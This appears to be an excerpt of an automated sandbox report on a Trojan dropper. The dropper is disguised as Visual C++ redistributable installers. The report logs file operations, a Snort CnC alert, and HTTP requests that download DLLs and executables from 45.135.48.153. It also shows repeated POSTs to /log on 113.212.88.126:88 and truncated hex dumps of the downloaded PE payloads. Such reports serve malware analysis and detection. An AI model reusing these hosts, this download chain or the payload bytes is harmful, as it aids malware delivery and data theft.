Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\NULL
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\NULL
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\NULL

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_010046B9 SendDlgItemMessageA,strstr,SetFileAttributesA,GetLastError,CopyFileA,SendDlgItemMessageA,strstr,SetFileAttributesA,CopyFileA,GetLastError,CopyFileA,SetFileAttributesA,SendDlgItemMessageA,_strlwr,GetLastError,MoveFileA,MoveFileA,_strlwr,strstr,FindFirstFileA,strrchr,SendDlgItemMessageA,DeleteFileA,Sleep,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,strchr,strrchr,SendDlgItemMessageA,	31_2_010046B9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012B66A3 _memset,_memset,GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,GetLastError,GetLastError,GetLastError,FindClose,	32_2_012B66A3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_01298BE8 _memset,FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	32_2_01298BE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012B5710 _memset,FindFirstFileW,FindClose,	32_2_012B5710

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034340 ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET 192.168.2.4:49758 -> 45.135.48.153:80

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769

Source: global traffic	HTTP traffic detected: GET /Vv/1/install_wim_tweak.dll HTTP/1.1Host: 45.135.48.153Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Vv/1/Remove.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/RuntimeBroker_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/RuntimeBrokerBin_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/WinPcap_4_1_3.exe HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/vcredist_2010_x64.exe HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/vcredist_2013_x64.exe HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Base_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Core_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Core.Extensions_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Packets_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/1/PcapDotNet.Analysis_64.dll HTTP/1.1Host: 45.135.48.153
Source: global traffic	HTTP traffic detected: GET /Vv/Ip.json HTTP/1.1Host: 45.135.48.153Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Vv/Ip.json HTTP/1.1Host: 113.212.88.126Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 65Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Vv/resource.json HTTP/1.1Host: 113.212.88.126
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /Vv/1/process.json HTTP/1.1Host: 113.212.88.126
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /log HTTP/1.1Host: 113.212.88.126:88Content-Length: 67Expect: 100-continue

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadLast-Modified: Sat, 29 Aug 2015 02:15:52 GMTAccept-Ranges: bytesETag: "0fcd5a00e2d01:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:26 GMTContent-Length: 45568Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf e8 da 55 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6a 00 00 00 46 00 00 00 00 00 00 62 88 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 88 00 00 4f 00 00 00 00 a0 00 00 90 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 87 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 68 00 00 00 20 00 00 00 6a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 90 42 00 00 00 a0 00 00 00 44 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 88 00 00 00 00 00 00 48 00 00 00 02 00 05 00 20 37 00 00 b8 4f 00 00 01 00 00 00 01 00 00 06 d8 86 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 06 00 10 07 00 00 01 00 00 11 1f 0f 28 18 00 00 0a 7e 05 00 00 04 28 19 00 00 0a 28 1a 00 00 0a 02 1f 09 8d 31 00 00 01 25 d0 93 00 00 04 28 1b 00 00 0a 28 0f 00 00 06 80 0b 00 00 04 7e 0b 00 00 04 1f 3f 6f 1c 00 00 0a 2c 26 72 01 00 00 70 28 19 00 00 0a 1f 0b 28 18 00 00 0a 72 ea 03 00 70 28 19 00 00 0a 28 1a 00 00 0a 17 28 1d 00 00 0a 7e 0b 00 00 04 1f 63 6f 1c 00 00 0a 2c 61 7e 0b 00 00 04 1f 63 6f 1e 00 00 0a 28 1f 00 00 0a 2d 1d 7e 0b 00 00 04 1f 63 6f 1e 00 00 0a 72 66 04 00 70 28 20 00 00 0a 80 0a 00 00 04 2b 2c 1f 0f 28 18 00 00 0a 72 68 04 00 70 28 21 00 00 0a 1f 0b 28 18 00 00 0a 28 22 00 00 0a 72 66 04 00 70 28 20 00 00 0a 80 0a 00 00 04 28 1a 00 00 0a 7e 0b 00 00 04 1f 6f 6f 1c 00 00 0a 2c 4e 28 23 00 00 0a 28 24 00 00 0a 72 19 05 00 70 28 20 00 00 0a 80 09 00 00 04 1f 0b 28 18 00 00 0a 72 5b 05 00 70 28 21 00 00 0a 28 1a 00 00 0a 7e 02 00 00 04 72 81 05 00 70 72 a9 05 00 70 6f 25 00 00 0a 80 02 00 00 04 17 80 0c 00 00 04 7e 0b 00 00 04 1f 68 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadLast-Modified: Wed, 13 Apr 2022 12:14:14 GMTAccept-Ranges: bytesETag: "0af59fd2f4fd81:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:36 GMTContent-Length: 23040Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 59 c8 72 a7 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 52 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 70 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 51 00 00 00 20 00 00 00 52 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 05 00 00 00 80 00 00 00 06 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 10 3e 00 00 88 32 00 00 01 00 00 00 2b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 03 00 60 00 00 00 00 00 00 00 02 72 01 00 00 70 7d 02 00 00 04 02 73 12 00 00 0a 7d 03 00 00 04 02 72 01 00 00 70 7d 04 00 00 04 02 72 01 00 00 70 7d 05 00 00 04 02 72 03 00 00 70 7d 06 00 00 04 02 28 13 00 00 0a 02 fe 06 03 00 00 06 73 14 00 00 0a 73 15 00 00 0a 25 17 6f 16 00 00 0a 6f 17 00 00 0a de 03 26 de 00 2a 01 10 00 00 00 00 3d 00 1f 5c 00 03 13 00 00 01 1b 30 05 00 cd 02 00 00 01 00 00 11 00 02 28 0b 00 00 06 0a 06 72 01 00 00 70 28 18 00 00 0a 2c 09 02 06 7d 05 00 00 04 de 27 de 19 0b 02 72 1f 00 00 70 07 6f 19 00 00 0a 28 1a 00 00 0a 28 0a 00 00 06 de 00 20 d0 07 00 00 28 1b 00 00 0a 2b bb 02 72 2f 00 00 70 02 7b 05 00 00 04 72 43 00 00 70 28 1c 00 00 0a 7d 04 00 00 04 02 28 04 00 00 06 02 73 1a 00 00 06 7d 01 00 00 04 02 28 08 00 00 06 02 fe 06 07 00 00 06 73 14 00 00 0a 73 15 00 00 0a 25 17 6f 16 00 00 0a 6f 17 00 00 0a 73 1d 00 00 0a 0c 08 72 9d 00 00 70 02 7b 06 00 00 04 72 ad 00 00 70 28 1c 00 00 0a 6f 1e 00 00 0a 17 8d 34 00 00 01 25 16 72 d1 00 00 70 28 1f 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadLast-Modified: Wed, 13 Apr 2022 12:14:10 GMTAccept-Ranges: bytesETag: "055f7fa2f4fd81:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:38 GMTContent-Length: 26624Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 36 d8 37 ea 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 60 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7d 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 5e 00 00 00 20 00 00 00 60 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 05 00 00 00 80 00 00 00 06 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 3e 00 00 f4 3d 00 00 01 00 00 00 3d 00 00 06 c4 7c 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 ed 01 00 00 01 00 00 11 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 07 00 00 04 02 28 14 00 00 0a 00 00 00 02 28 09 00 00 06 00 00 03 13 04 16 13 05 2b 17 11 04 11 05 9a 13 06 00 02 11 06 7d 03 00 00 04 00 11 05 17 58 13 05 11 05 11 04 8e 69 32 e1 02 fe 06 06 00 00 06 73 15 00 00 0a 73 16 00 00 0a 0a 06 17 6f 17 00 00 0a 00 06 6f 18 00 00 0a 00 28 19 00 00 0a 6f 1a 00 00 0a 0b 72 03 00 00 70 28 1b 00 00 0a 0c 00 08 13 07 16 13 08 2b 27 11 07 11 08 9a 13 09 00 11 09 6f 1c 00 00 0a 00 11 09 6f 1d 00 00 0a 00 11 09 6f 1e 00 00 0a 00 00 11 08 17 58 13 08 11 08 11 07 8e 69 32 d1 72 0f 00 00 70 28 1f 00 00 0a 0d 00 09 13 0a 16 13 0b 38 08 01 00 00 11 0a 11 0b 9a 13 0c 00 00 11 0c 72 21 00 00 70 28 20 00 00 0a 13 0d 11 0c 72 37 00 00 70 28 20 00 00 0a 13 0e 11 0d 28 21 00 00 0a 13 0f 11 0f 2c 27 00 11 0d 72 7f 00 00 70 28 20 00 00 0a 13 10 11 10 28 22 00 00 0a 13 11 11 11 2c 0a 00 11 10 28 23 00 00 0a 00 00 00 11 0e 28 21 00 00 0a 13 12 11 12 39 90 00 00 00 00 11 0e 72 95 00 00 70
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 09 Nov 2021 09:06:22 GMTAccept-Ranges: bytesETag: "0bbaf1049d5d71:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:38 GMTContent-Length: 915128Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cc e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5e 00 00 00 84 02 00 00 04 00 00 fa 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 04 00 00 04 00 00 e7 dc 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 f0 03 00 a8 43 00 00 00 00 00 00 00 00 00 00 c0 d7 0d 00 f8 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c 5c 00 00 00 10 00 00 00 5e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 a8 43 00 00 00 f0 03 00 00 44 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 